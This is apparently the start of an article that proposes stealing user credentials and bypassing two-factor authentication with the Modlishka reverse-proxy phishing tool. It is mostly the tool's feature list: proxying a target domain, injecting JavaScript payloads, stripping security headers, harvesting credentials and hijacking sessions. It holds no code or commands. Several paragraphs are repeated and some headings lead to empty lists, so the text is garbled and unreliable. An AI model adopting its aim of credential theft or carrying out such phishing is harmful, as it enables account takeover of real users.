In this article, I propose to consider a method for stealing user credentials using reverse - proxy technology, which will allow us to bypass two-factor authentication.
To do this, we will use and customize a tool that is quite famous in certain circles called Modlishka.
Modlishka is a powerful and flexible HTTP reverse proxy. It implements a completely new and interesting browser-based HTTP traffic stream processing approach that allows you to transparently proxy multi-domain targeted traffic, both TLS and non-TLS, through a single domain without the need to install any additional certificate on the client.
What exactly does this mean? In short, it just has a lot of potential that can be used in many use cases.
From a security point of view, Modlishka can currently be used to:
The results achieved were very interesting and the tool was initially released and then updated to:
Effective proxying!
Features
General:
To do this, we will use and customize a tool that is quite famous in certain circles called Modlishka.
Modlishka is a powerful and flexible HTTP reverse proxy. It implements a completely new and interesting browser-based HTTP traffic stream processing approach that allows you to transparently proxy multi-domain targeted traffic, both TLS and non-TLS, through a single domain without the need to install any additional certificate on the client.
What exactly does this mean? In short, it just has a lot of potential that can be used in many use cases.
From a security point of view, Modlishka can currently be used to:
- Conducting ethical phishing penetration tests using a transparent and automatic reverse proxy component with universal support for two-factor authentication.
- Automatic HTTP 301 browser cache poisoning and permanent URL capture, no TLS.
- Diagnostics and interception of HTTP traffic of browser applications in terms of the "Client Domain Hooking" attack.
- Wrapping legacy websites in TLS to obfuscate bots, automated crawlers, etc.
The results achieved were very interesting and the tool was initially released and then updated to:
- Highlight the weaknesses of the currently used two-factor authentication (2FA) scheme so that adequate security solutions can be created and implemented in the industry.
- Support other projects that could benefit from a universal and transparent reverse proxy.
- Raise community awareness of modern phishing techniques and strategies and support penetration testers in their daily work.
Effective proxying!
Features
General:
- Point-and-click HTTP and HTTPS reverse proxying of an arbitrary domain.
- Full control over the flow of cross-origin TLS traffic from your users' browsers (without the need to install any additional certificates on the client).
- Easy and fast configuration with command line options and JSON configuration files.
- Template-based JavaScript payload injection.
- Wrapping websites with additional "security": TLS wrapping, authentication, appropriate security headers, etc.
- Removing websites from all encryption and security headers (back to 90s MITM style).
- Stateless design. Can be easily scaled to handle an arbitrary amount of traffic - for example, through a DNS load balancer.
- Can be easily extended to your ideas with modular plugins.
- TLS certificate auto test plugin for proxy domain (requires self-signed CA certificate)
- Written in Go, so it works on almost all platforms and architectures: Windows, OSX, Linux, BSD is supported.
- Support for most 2FA authentication schemes (out of the box).
- Practical implementation of the "Client Domain Hooking" attack. Supported by the diagnostic plugin.
- Collection of user credentials (with context based on IDs passed in URL parameter).
- A web panel plugin with a summary of auto-collected credentials and a one-click user session impersonation module (proof-of-concept / beta).
- No website templates (just point Modlishka to the target domain - in most cases it will be processed automatically without additional manual configuration).
